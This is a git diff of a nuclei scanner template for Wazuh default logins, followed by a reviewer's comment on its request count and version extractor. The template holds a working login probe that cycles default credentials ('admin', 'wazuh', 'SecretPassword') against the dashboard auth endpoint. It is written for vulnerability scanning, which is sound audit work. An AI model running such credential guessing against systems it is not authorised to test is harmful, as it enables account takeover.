diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml
index d2bd97b963..2c2c323160 100644
--- a/http/default-logins/wazuh-default-login.yaml
+++ b/http/default-logins/wazuh-default-login.yaml
@@ -2,33 +2,45 @@ id: wazuh-default-login info: name: Wazuh - Default Login - author: theamanrawat + author: theamanrawat,denandz,PulseSecurity.co.nz severity: high description: | Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html - https://wazuh.com + - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment metadata: verified: true - max-request: 4 + max-request: 6 shodan-query: title:"Wazuh" tags: wazuh,default-login http: + - method: GET + path: + - "{{BaseURL}}/app/login" + + extractors: + - type: regex + part: body + name: osd + group: 1 + internal: true + regex: + - '"version":"([0-9.]+)"' + - raw: - - | - GET /app/login?nextUrl=%2Fapp%2Fwazuh HTTP/1.1 - Host: {{Hostname}} - | POST /auth/login HTTP/1.1 Host: {{Hostname}} Osd-Version: {{osd}} + osd-xsrf: osd-fetch Content-Type: application/json {"username":"{{username}}","password":"{{password}}"} - attack: pitchfork + attack: clusterbomb payloads: username: - "admin"
@@ -36,6 +48,7 @@ http: password: - "admin" - "wazuh" + - "SecretPassword" stop-at-first-match: true matchers-condition: and
@@ -56,13 +69,3 @@ http: - type: status status: - 200 - - extractors: - - type: regex - name: osd - group: 1 - regex: - - '"version":"([0-9.]+)"' - internal: true - -# digest: 4b0a00483046022100de2c876067d0aa43fb62771bff3c3adea76873a9f0982f98856a1ed321b58d48022100a60ef9271fd209ecadc68b365c82e4176cd78fe24526dcbe7a8cd8772b0337cf:922c64590222798bb761d5b6d8e72950
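Review bot: `max-request: 6` in the first hunk looks one short: nuclei sums the requests of every `http` entry, so the new GET /app/login request counts in addition to the clusterbomb grid of 2 usernames × 3 passwords (the second username sits just past the hunk edge and `SecretPassword` lands in the next hunk), which comes to 7; unless the signing tooling counts differently, the line should read `max-request: 7` — `nuclei -validate` will report the exact figure. A second point deserves a comment on the new extractor: `osd` is only set when the login page body matches `"version":"([0-9.]+)"`, and when it does not, `{{osd}}` in the `Osd-Version` header stays unresolved, which nuclei should treat as a reason to skip the POST rather than send a literal placeholder. Write that down as `# internal: if the page embeds no "version" field, {{osd}} stays unresolved and the login POST is skipped` above the extractor, so that an empty result in debug output is not mistaken for a non-default password. The `osd-xsrf: osd-fetch` value itself is fine, since OpenSearch Dashboards only checks for the header's presence on non-GET calls as far as I recall.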